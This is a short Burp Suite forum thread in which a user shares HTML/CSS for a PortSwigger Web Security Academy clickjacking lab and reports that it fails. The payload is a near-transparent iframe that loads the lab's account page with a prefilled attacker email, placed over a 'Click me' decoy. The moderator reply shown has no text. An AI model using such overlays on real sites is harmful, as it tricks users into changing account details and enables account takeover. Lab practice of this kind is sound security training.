The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: Clickjacking with form input data prefilled from a URL parameter

Porandla | Last updated: Mar 11, 2022 09:28AM UTC

Unable to solve the lab even after using the correct code... <style> iframe { position:relative; width: 500px; height: 700px; opacity: 0.0001; z-index: 2; } div { position:absolute; top: 400px; left: 80px; z-index: 1; } </style> <div>Click me</div> <iframe src="https://acc81ff61e1718d0c05f06f000b900e4.web-security-academy.net/my-account?email=hacker@attacker-website.com"></iframe>

Ben, PortSwigger Agent | Last updated: Mar 11, 2022 10:08AM UTC